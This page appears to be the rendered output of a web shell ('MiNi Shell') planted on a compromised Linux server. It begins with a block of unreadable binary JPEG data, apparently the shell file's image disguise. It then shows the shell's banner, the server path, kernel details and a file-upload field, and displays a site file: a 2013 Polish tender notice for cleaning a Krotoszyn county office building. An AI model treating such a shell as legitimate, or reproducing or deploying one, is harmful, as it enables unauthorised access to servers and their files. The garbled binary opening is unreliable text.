JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130913/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130913/186621-N-2013.html

<p class="kh_header"><b>Krotoszyn: Sprzątanie pomieszczeń w budynku Nr 3  Starostwa Powiatowego w Krotoszynie.</b><br>
<b>Numer ogłoszenia: 186621 - 2013; data zamieszczenia: 13.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Krotoszyński reprezentowany przez Zarząd Powiatu Krotoszyńskiego , ul. 56 Pułku Piechoty Wlkp. 10, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 7254256, faks 062 7253423.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie pomieszczeń w budynku Nr 3  Starostwa Powiatowego w Krotoszynie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sprzątanie pomieszczeń w budynku Nr 3  Starostwa Powiatowego w Krotoszynie. mieszącego się przy ul. 56 Pułku Piechoty Wlkp. 10 a. Usługą sprzątania objęte zostaną kondygnacje budynku określone w załączniku Nr 2 do SIWZ. I piętro zajęte będzie pod potrzeby Powiatowego Inspektoratu Nadzoru Budowlanego  Pomieszczenia te nie są objęte usługą sprzątania, z wyjątkiem powierzchni określonychw załączniku Nr 2.Utrzymanie czystości będzie obejmowało pomieszczenia biurowe, archiwum, Toalety, ciągi komunikacyjne, klatki schodowe, wejścia do  budynków,  mycie okien Usługi codziennego sprzątania  będą obejmowały również sytuacje sprzątania Pomieszczeń  po wykonanych remontach oraz w przypadku wystąpienia awarii. Szczegółowy opis przedmiotu  zamówienia oraz częstotliwość wykonywania prac zawiera    załącznik Nr 1 do niniejszej SIWZ, Całość prac związanych wykonywaniem przedmiotu zamówienia odbywać się będzie przy    pomocy własnego personelu, użyciu przez wykonawcę własnego sprzętu, narzędzi  i   środków czyszczących. Wykonawca zobowiązany jest zatrudnić taką ilości  pracowników, która zagwarantuje prawidłową, profesjonalną i nieprzerwaną realizację usług.  Usługi sprzątania wykonywane będą przez Wykonawcę profesjonalnym sprzętem, właściwym do danego rodzaju prac i powierzchni gwarantującym wysoką jakość świadczonych usług. Wykonawca zapewni na własny koszt (na bieżąco) materiały, narzędzia  i środki czyszczące, dezynfekujące, zapachowe (kostki toaletowe, odświeżacze powietrza), worki na śmieci, odzież ochronną  i inne niezbędne do  prawidłowego wykonania przedmiotu zamówienia. Wykonawca będzie używał środków czyszczących i środków higieniczno-sanitarnych o dobrej jakości, posiadających atest PZH do powszechnego stosowania. Przez odświeżacze powietrza Zamawiający rozumie zakupiony przez Wykonawcę (na własny koszt) elektroniczny odświeżacz powietrza (np. na baterie) z  wymiennymi wkładami zapachowymi, montowany na stałe w  toaletach. Posiadający 3 opcje programowanej częstotliwości emisji zapachu. Wykonawca zobowiązany jest na bieżąco (wg potrzeb) na swój koszt, zapewniać wkłady zapachowe oraz baterie do zamontowanych urządzeń. Po upływie okresu na jaki zostanie zawarta umowa  z Wykonawcą,   urządzenia- elektroniczne odświeżacze powietrza  przechodzą na własność   Zamawiającego. Wykonawca zobowiązany jest zapewnić 2 szt. odświeżaczy elektronicznych wraz z  ich montażem w miejscach wskazanych przez Zamawiającego wraz z  wkładami zapachowymi i bateriami. Wykonawca zobowiązany jest w czasie wykonywania usług zapewnić na terenie objętym umową należyty ład i porządek, a prace wykonywać w sposób najmniej uciążliwy dla użytkowanego obiektu. Wykonawca będzie przestrzegał przepisów BHP i P.Poż w zakresie czynności zgodnych z opisem przedmiotu zamówienia i odpowiadać za przestrzeganie tych przepisów. Wykonawca zobowiązany jest do niezwłocznego zgłaszania wszelkich uwag o usterkach  wymagających napraw, których nie jest w stanie usunąć, np. zepsute zamki drzwiowe,  niedrożne umywalki, sedesy, zauważone  uszkodzenia sieci wodnokanalizacyjnej osobie upoważnionej - Kierownik Referatu Gospodarczego Wykonawca niezwłocznie (w ciągu 2 dni) po podpisaniu umowy zobowiązany jest do przedstawienia zamawiającemu na piśmie informacji o pracownikach - nie karanych - wyznaczonych do realizacji zamówienia  oraz wyznaczenie pracownika  odpowiedzialnego za  sprawowanie nadzoru i kontroli  nad wykonywaniem przedmiotu  umowy. Lista winna zawierać imię, nazwisko adres zamieszkania oraz numer dowodu osobistego. W  stosunku do osoby wyznaczonej do kontroli i nadzoru  oprócz  imienia, nazwiska, adresu zamieszkania i nr dowodu osobistego  należy wskazać numer telefonu, pod którym  zgłaszane będą niezbędne informacje, zastrzeżenia do wykonywanej pracy itp. Wykonawca zobowiązany jest pisemnie informować zamawiającego o każdej zmianie w obsadzie pracowników wyznaczonych do realizacji zamówienia przynajmniej na jeden dzień przed zaistnieniem przedmiotowej sytuacji. W przypadkach uzasadnionych (np. niestawienie się pracownika do pracy) doraźnie ze wskazaniem z imienia i nazwiska, adresu zamieszkania i nr dowodu osobistego   osoby  wyznaczonej na zastępstwo. Osoba, której dane nie zostały przekazane na piśmie zamawiającemu nie  zostanie wpuszczona na teren  obiektu. Wykonawca przyjmie od pracowników przeznaczonych do realizacji zamówienia, oświadczenia o zachowaniu w tajemnicy wszelkich informacji dotyczących Zamawiającego, powziętych w związku z    wykonywaniem  prac objętych umową, a uwierzytelnione kopie oświadczeń  przedłoży Zamawiającemu.. Wykonawca ponosi odpowiedzialność za szkody powstałe w związku z nieprawidłową   realizacją usług oraz w skutek innych działań pracowników. Wykonawca zobowiązany jest do :usunięcia usterek spowodowanych niewłaściwą eksploatacją sieci elektrycznej, wodnokanalizacyjnej, pokrycia szkód spowodowanych  użyciem nieodpowiednich środków piorących i czyszczących, w wyniku których spowoduje zniszczenie lub nieprzydatność do dalszego użytkowania Wykonawca oraz wyznaczeni pracownicy zobowiązani są do  zachowania w     tajemnicy wszelkich informacji uzyskanych w związku z wykonywaniem usług. Wykonawca zobowiązany jest do utrzymywania stałego kontaktu z osobą    upoważnioną    przez Zamawiającego - Kierownik Referatu Gospodarczego Osoby sprzątające zobowiązane są  po zakończeniu pracy do zamknięcia  budynków i  zdania kluczy w miejscu wskazanym przez Zamawiającego. Wykonawca zobowiązany jest do wykonywania usługi 5 dni w tygodniu, od poniedziałku  do piątku. Sprzątanie odbywać się będzie  nie wcześniej niż od godziny 15.00 i nie    później niż do  godziny 20.00. Podczas pracy każda z osób sprzątających otwiera tylko to pomieszczenie, które aktualnie   sprząta. Drzwi  pozostałych pomieszczeń powinny być w tym czasie  zamknięte na klucz. Po zakończeniu pracy w danym pomieszczeniu osoba sprzątająca zobowiązana jest do sprawdzenia zamknięcia okien  oraz odłączenia sprzętu elektrycznego z wyjątkiem sprzętu  komputerowego, telekomunikacyjnego. Wskazane jest aby wykonawcy przed opracowaniem oferty dokonali wizji lokalnej w obiekcie dotyczących sprzątania. Zamawiający udostępni nieodpłatnie do realizacji zamówienia: energię elektryczną, ciepłą i zimną wodę, miejsca do przechowywania sprzętu i środków czystości. Zamawiający zapewni dostęp do pomieszczeń socjalnych i sanitarnych dla personelu   Wykonawcy. Zaopatrzenie w papier toaletowy i mydło leży po stronie zamawiającego. Miejsce wykonywania usług: Starostwo Powiatowe 63-700 Krotoszyn Ul. 56 Pułku Piechoty Wlkp. 10 a Powierzchnia i jej rodzaj przewidziana do sprzątania  określona została w załączniku Nr 2 do SIWZ.1. Pomieszczenia biurowe. Opis czynności Wycieranie kurzu z mebli, lamp,  obrazów, elementów dekoracyjnych, symboli itp. Czyszczenie mebli płynem do konserwacji (odpowiednim do rodzaju powierzchni)Odkurzanie mebli tapicerowanych Usuwanie pajęczyn Wycieranie (w razie potrzeby mycie) drzwi, ościeżnic,  klamek, koszy na śmieci Mycie drzwi przeszklonych Opróżnianie koszy na śmieci (z każdorazową wymianą worków) oraz ich  usuwanie do kontenera Opróżnianie  pojemników niszczarek i uzupełnienie w  nowe worki Czyszczenie urządzeń biurowych (drukarek, kserokopiarek, niszczarek, faksów, aparatów telefonicznych)Odkurzanie, zmywanie, powierzchni podłóg drewnianych parkietu, paneli Pastowanie, froterowanie powierzchni podłóg drewnianych parkietu, paneli Odkurzanie zmywanie na mokro specjalistycznymi preparatami powierzchni podłóg (wykładzina tarkett) Mycie  opraw oświetleniowych i wentylacyjnych oraz kontaktów i gniazdek Mycie, czyszczenie przeszkleń w meblach Mycie parapetów okiennych Mycie grzejników Wykonywanie innych czynności niezbędnych do utrzymania  czystości 2.  Hole, korytarze, schody, klatki schodowe Opis czynności Odkurzanie, mycie    posadzek granitowych i z  płytek Mycie cokołów przypodłogowych Utrzymywanie w czystości wycieraczek i mat wejściowych Usuwanie pajęczyn Mycie drzwi przeszklonych Opróżnianie koszy na śmieci (z każdorazową wymianą worków) oraz ich  usuwanie do kontenera Wycieranie poręczy schodów Mycie parapetów okiennych Mycie  opraw oświetleniowych i wentylacyjnych, kontaktów i gniazdek oraz urządzeń kontroli dostępu Mycie schodów i klatek schodowych Mycie grzejników Wykonywanie innych czynności niezbędnych do utrzymania  czystości 3.  Pomieszczenia sanitarne, socjalne, kuchnie  Opis czynności Mycie na mokro płynem dezynfekującym  posadzek i płytek Utrzymanie w czystości umywalek, sedesów, pisuarów, luster, armatury, podajników na papier toaletowy, na mydło w płynie, suszarek do rąk, koszy na odpady i innego wyposażenia Zabezpieczenie w  środki dezynfekujące i zapachowe (kostki toaletowe, odświeżacze powietrza)Usuwanie pajęczyn Opróżnianie koszy na śmieci (z każdorazową wymianą worków) oraz ich  usuwanie do kontenera Czyszczenie i dezynfekcja kratek ściekowych Mycie zlewozmywaków, armatury, szafek kuchennych Usuwanie rdzy i kamienia z urządzeń sanitarnych Neutralizacja zapachów w pomieszczeniach sanitarnych Mycie grzejników Wykonywanie innych czynności niezbędnych do utrzymania  czystości Sanitariaty  winny być sprzątane  z użyciem środków odkażających, usuwających kamień oraz środków Zapachowych  (kostki toaletowe,  odświeżacze powietrza). Podłogi  w pomieszczeniach sanitarnych  winny być sprzątane na mokro z użyciem płynu  antypoślizgowego4. Archiwum Opis czynności Odkurzanie, mycie podłóg, płytki gres, panele5.  Mycie okien. Opis czynności Mycie wszystkich okien znajdujących się w budynku w okresie kwiecień-maj oraz wrzesień -październik POWIERZCHNIE DO SPRZĄTANIA i  ICH  RODZAJE	BUDYNEK NR 3 (ul.56 Pułku Piechoty Wielkopolskiej 10a).  PARTER biura (panele) 55,4 m2 sanitariaty płytki)11,8 mkw. klatka schodowa (płytki, gres)11,00 mkw. korytarze (płytki gres)	29,00 mkw. archiwum (płytki gres)	 36 mkw. archiwum (panele) 4,20 mkw. okna drewniane skrzynkowe	 8 szt. x 2,4 mkw2. I PIĘTRO	 klatka schodowa (płyty granitowe)	13,6 mkw. korytarze (płytki gres)	32,9 mkw.	 okno drewniane skrzynkowe  3,6 mkw. (1 szt.)3. II PIĘTRO biura (panele) 59,5 mkw. sanitariaty (płytki gres)12,60 mkw. klatka schodowa (kamień granit)13,6 mkw. korytarze (płytki gres) 30,09 mkw. okna drewniane skrzynkowe6 szt.  1,9  mkw.  3 szt. 2,4 mkw. 1 szt.  3,6 mkw..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 74.70.00.00-6, 74.75.00.00-1, 74.72.20.00-6, 74.74.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje  możliwość dokonania zmian postanowień zawartej umowy w szczególności:
a)	zmiany wysokości wynagrodzenia Wykonawcy, w przypadku zmiany stawki podatku VAT.
b)	zmiany wynagrodzenia w przypadku  zmiany - zmniejszenia powierzchni przeznaczonej do wykonywania usług będących przedmiotem zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://powiat-krotoszyn.bip.net.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://powiat-krotoszyn.bip.net.pl/
lub
Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2013 godzina 09:00, miejsce: Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn
pok. 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com